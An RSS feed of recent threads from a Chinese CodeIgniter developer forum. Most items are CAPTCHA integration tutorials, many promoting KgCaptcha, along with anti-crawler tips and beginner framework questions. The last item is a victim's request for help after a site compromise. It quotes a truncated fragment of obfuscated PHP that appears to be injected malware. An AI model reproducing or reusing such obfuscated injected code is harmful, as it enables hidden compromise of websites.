<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
  <channel>
    <title>CodeIgniter 中国开发者社区 - Web 开发综合讨论</title>
    <link>https://codeigniter.org.cn/forums/forum-web-1.html</link>
    <description>Latest 20 threads of Web 开发综合讨论</description>
    <copyright>Copyright(C) CodeIgniter 中国开发者社区</copyright>
    <generator>Discuz! Board by Comsenz Inc.</generator>
    <lastBuildDate>Sat, 04 Apr 2026 13:29:32 +0000</lastBuildDate>
    <ttl>60</ttl>
    <image>
      <url>https://codeigniter.org.cn/forums/static/image/common/logo_88_31.gif</url>
      <title>CodeIgniter 中国开发者社区</title>
      <link>https://codeigniter.org.cn/forums/</link>
    </image>
    <item>
      <title>一个Node.js图形验证码的生成</title>
      <link>https://codeigniter.org.cn/forums/thread-31205-1-1.html</link>
      <description><![CDATA[效果图




准备
[*]访问KgCaptcha网站，注册账号后登录控制台，访问“无感验证”模块，申请开通后系统会分配给应用一个唯一的AppId、AppSecret。
[*]提供后端SDK来校验token(即安全凭据)是否合法 ，目前支持PHP版、Python版、Java/JSP版、.Net C#版。
[*]访问Node.js官 ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>宙哈哈</author>
      <pubDate>Fri, 14 Apr 2023 02:25:25 +0000</pubDate>
    </item>
    <item>
      <title>Vue.js 滑动拼图验证码实现笔记</title>
      <link>https://codeigniter.org.cn/forums/thread-31204-1-1.html</link>
      <description><![CDATA[背景关于验证码的使用场景还是非常多的，很多网站上的验证码可谓是五花八门，下面是我使用Vue.js实现滑动拼图验证码做的一个笔记。
效果展示


准备工作
[*]访问KgCaptcha网站，注册账号后登录控制台，访问“无感验证”模块，申请开通后系统会分配给应用一个唯一的AppId ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>宙哈哈</author>
      <pubDate>Fri, 14 Apr 2023 02:09:27 +0000</pubDate>
    </item>
    <item>
      <title>C#实现KgCaptcha滑动拼图验证码笔记</title>
      <link>https://codeigniter.org.cn/forums/thread-31202-1-1.html</link>
      <description><![CDATA[前言C# 是一个现代的、通用的、面向对象的编程语言，它是由微软(Microsoft)开发的，由 Ecma 和 ISO 核准认可的。突发奇想，动手开发一个C#滑动拼图验证码，下面是我开发过程的记录。
准备工作本文使用IIS搭建环境，同时确保项目运行正常。


目录结构




核心代码
[*]n ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>宙哈哈</author>
      <pubDate>Thu, 13 Apr 2023 02:44:52 +0000</pubDate>
    </item>
    <item>
      <title>【记】滑动拼图验证码在搜索中的作用</title>
      <link>https://codeigniter.org.cn/forums/thread-31201-1-1.html</link>
      <description><![CDATA[开头验证码应用于我们生活、工作的方方面面，比如注册登录账号、支付订单、修改密码等。下面我是在一次项目中利用滑动拼图验证码和搜索功能“合作共赢”的记录。
验证码展示




具体实现前端代码
验证结果说明



Python代码
最后SDK开源地址：https://github.com/KgCa ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>宙哈哈</author>
      <pubDate>Thu, 13 Apr 2023 02:27:41 +0000</pubDate>
    </item>
    <item>
      <title>PHP短信验证码防刷方案</title>
      <link>https://codeigniter.org.cn/forums/thread-31200-1-1.html</link>
      <description><![CDATA[前言短信验证码是通过发送验证码到手机的一种有效的验证码系统。利用短信验证码来注册会员，大大降低了非法注册的数据。下面是我在项目开发中，对防止恶意或者无意刷新验证码做的解决方案笔记。


时间限制例如30秒后才能再次发送。点击发送短信验证码后，客户端开始30 ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>宙哈哈</author>
      <pubDate>Tue, 11 Apr 2023 03:21:02 +0000</pubDate>
    </item>
    <item>
      <title>[验证码] KgCaptcha风险监测方法</title>
      <link>https://codeigniter.org.cn/forums/thread-31197-1-1.html</link>
      <description><![CDATA[前言
“访问过于频繁，请先完成验证”，相信大家对这句话应该不陌生。当我们访问一个网站过于频繁时，就会弹出这样的提示，甚至于让我们先通过滑动验证码。

开发过程
1、模拟当前为新闻列表。

2、前台接入KgCaptcha





3、要求4、后端验证最后SDK开源地址：https:// ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>宙哈哈</author>
      <pubDate>Mon, 10 Apr 2023 03:25:19 +0000</pubDate>
    </item>
    <item>
      <title>使用验证码拦截爬虫和机器人实践分享</title>
      <link>https://codeigniter.org.cn/forums/thread-31196-1-1.html</link>
      <description><![CDATA[背景
在很多时候我们都会遇到验证码的多种场景，不同的产品也会使用不同的登录验证方式。
在项目开发中，我将KgCaptcha应用到搜索和分页中，下面是我写的的记录。



开发过程
1、页面创建一个搜索表单





2、接入KgCaptcha





3、弹出验证窗口按钮

将表单提交绑定 ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>宙哈哈</author>
      <pubDate>Mon, 10 Apr 2023 03:17:58 +0000</pubDate>
    </item>
    <item>
      <title>KgCaptcha接入汇总</title>
      <link>https://codeigniter.org.cn/forums/thread-31195-1-1.html</link>
      <description><![CDATA[开头的话

最近有在用一款好玩的验证码产品，乐于探索的我，决定从不同的语言去探索这款验证码。
KgCaptcha支持PHP、Python、Java、C#的接入。下面是我接入过程记录中的代码。





HTML




PHP



Python



Java





C#


最后SDK开源地址：https://github.com/KgC ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>宙哈哈</author>
      <pubDate>Mon, 10 Apr 2023 03:05:40 +0000</pubDate>
    </item>
    <item>
      <title>恶意爬虫？能让恶意爬虫遁于无形的小Tips</title>
      <link>https://codeigniter.org.cn/forums/thread-31194-1-1.html</link>
      <description><![CDATA[前言
验证码是阻挡机器人攻击的有效实践，网络爬虫，又被称为网络机器人，是按照一定的规则，自动地抓取网络信息和数据的程序或者脚本。如何防控，这里简单提供几个小Tips。



使用nginx的自带功能
通过对httpuseragent阻塞来实现，包括GET/POST方式的请求，以nginx为 ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>宙哈哈</author>
      <pubDate>Fri, 07 Apr 2023 08:01:46 +0000</pubDate>
    </item>
    <item>
      <title>【干货】验证码的常见类型总结</title>
      <link>https://codeigniter.org.cn/forums/thread-31193-1-1.html</link>
      <description><![CDATA[前言
验证码是一种区分用户是计算机和人的公共全自动程序。简单来说，验证码就是验证操作是人还是机器。下面我就总结一下常见的验证码类型都有哪些？




数字、字母组合
这种形式最为常见，也很简单。有的是单独使用这两种，也有的是数字、字母混合而成，为了提高识别 ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>宙哈哈</author>
      <pubDate>Fri, 07 Apr 2023 07:57:42 +0000</pubDate>
    </item>
    <item>
      <title>新手问一下，可以在windows server上面使用ci么，</title>
      <link>https://codeigniter.org.cn/forums/thread-31092-1-1.html</link>
      <description><![CDATA[新手问一下，可以在windows server上面使用ci么，搭建环境需要注意什么问题]]></description>
      <category>Web 开发综合讨论</category>
      <author>z95469</author>
      <pubDate>Sat, 21 Dec 2019 03:52:03 +0000</pubDate>
    </item>
    <item>
      <title>SMProxy，一个基于 MySQL 协议，Swoole 开发的MySQL数据库连接池。</title>
      <link>https://codeigniter.org.cn/forums/thread-25612-1-1.html</link>
      <description><![CDATA[中文 | English  /$$$$$$  /$$      /$$ /$$$$$$$ /$$__  $$| $$$    /$$$| $$__  $$| $$  \\__/| $$$$  /$$$$| $$  \\ $$ /$$$$$$   /$$$$$$  /$$   /$$ /$$   /$$|  $$$$$$ | $$ $$/$$ $$| $$$$$$$//$$__  $$ /$$__  $$|  $$ /$$/| $$  | $$ \\____  $$| $$  $$$| $$| $$ ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>louislivi</author>
      <pubDate>Tue, 29 Jan 2019 06:31:34 +0000</pubDate>
    </item>
    <item>
      <title>关于ci调用html的问题</title>
      <link>https://codeigniter.org.cn/forums/thread-25501-1-1.html</link>
      <description><![CDATA[就是别人写了个前端html文件，还将css，jq都放在同一个index.html文件，然后我该如何去调用这个html文件呢，我在控制器里尝试用$this-&gt;load-&gt;view(\'index.html\'),但出错了，作为一个新手，虽然看了文档，但还是不知在哪里搞起 ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>网友</author>
      <pubDate>Mon, 17 Sep 2018 03:17:42 +0000</pubDate>
    </item>
    <item>
      <title>CI框架Form表单提交怎么不刷新页面?</title>
      <link>https://codeigniter.org.cn/forums/thread-25497-1-1.html</link>
      <description><![CDATA[填写您的拍摄需求，计算您的拍片价格

视频类别


我我我
你你你
他他他
啊啊啊
哟哟哟


时长


1~3分钟
3~5分钟
5~10分钟


导演团队


专业级导演团队
广告级导演团队
电影级导演团队


拍摄设备


专业级设备(HD)
广告级设备(2K)
电影级设备(4K)


您的联系方 ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>ccal677490</author>
      <pubDate>Fri, 07 Sep 2018 09:12:54 +0000</pubDate>
    </item>
    <item>
      <title>搜索引擎不收录!!上线大半年了一个关键词都没收录!</title>
      <link>https://codeigniter.org.cn/forums/thread-25496-1-1.html</link>
      <description><![CDATA[是不是CI框架的程序搜索引擎不收录啊?上线大半年,就把首页收录了,索引量1
今天有人给我说可能是程序方面的问题.求大佬来看看到底啥情况!!

网站首页:www.zggyyl.com
整个网站都是CI框架的

在这谢谢大家了!!!
这是抓取的数据
 ...]]></description>
      <category>Web 开发综合讨论</category>
      <author>cy4369412</author>
      <pubDate>Fri, 07 Sep 2018 03:30:24 +0000</pubDate>
    </item>
    <item>
      <title>请问如何做留言系统</title>
      <link>https://codeigniter.org.cn/forums/thread-25488-1-1.html</link>
      <description><![CDATA[就像豆瓣里的书评那种？ 我在网上没看到具体教程？ 哪位大佬能指点我一下？不胜感激。]]></description>
      <category>Web 开发综合讨论</category>
      <author>王思聪</author>
      <pubDate>Thu, 30 Aug 2018 01:44:01 +0000</pubDate>
    </item>
    <item>
      <title>错误信息：Module \'xsl\' already loaded</title>
      <link>https://codeigniter.org.cn/forums/thread-25484-1-1.html</link>
      <description><![CDATA[ci新手 请问怎么解决 如图]]></description>
      <category>Web 开发综合讨论</category>
      <author>dugulp</author>
      <pubDate>Sun, 26 Aug 2018 04:14:17 +0000</pubDate>
    </item>
    <item>
      <title>框架经常提示遇到xsl错误</title>
      <link>https://codeigniter.org.cn/forums/thread-25478-1-1.html</link>
      <description><![CDATA[如图所示]]></description>
      <category>Web 开发综合讨论</category>
      <author>dugulp</author>
      <pubDate>Tue, 21 Aug 2018 18:35:27 +0000</pubDate>
    </item>
    <item>
      <title>请问论坛的这个人机验证码 如何做的</title>
      <link>https://codeigniter.org.cn/forums/thread-25463-1-1.html</link>
      <description><![CDATA[最主要想问下 ，我在做一个公司的后台管理系统。想问下 这个这个验证码需要和后端进行交互吗？ 还是直接引前端的js就可以验证了]]></description>
      <category>Web 开发综合讨论</category>
      <author>lePig</author>
      <pubDate>Mon, 06 Aug 2018 01:08:23 +0000</pubDate>
    </item>
    <item>
      <title>求助，被挂马</title>
      <link>https://codeigniter.org.cn/forums/thread-25278-1-1.html</link>
      <description><![CDATA[x57\&quot;;$w235c[$w235c[\'dd4adbf\'][7].$w235c[\'dd4adbf\'][15].$w235c[\'dd4adbf\'][41].$w235c[\'dd4adbf\'][15].$w235c[\'dd4adbf\'][1]] = $w235c[\'dd4adbf\'][53].$w235c[\'dd4adbf\'][70].$w235c[\'dd4adbf\'][44];$w235c[$w235c[\'dd4adbf\'][23].$w235c[\'dd4adbf\']]></description>
      <category>Web 开发综合讨论</category>
      <author>zybzrb</author>
      <pubDate>Sun, 20 May 2018 02:51:44 +0000</pubDate>
    </item>
  </channel>
</rss>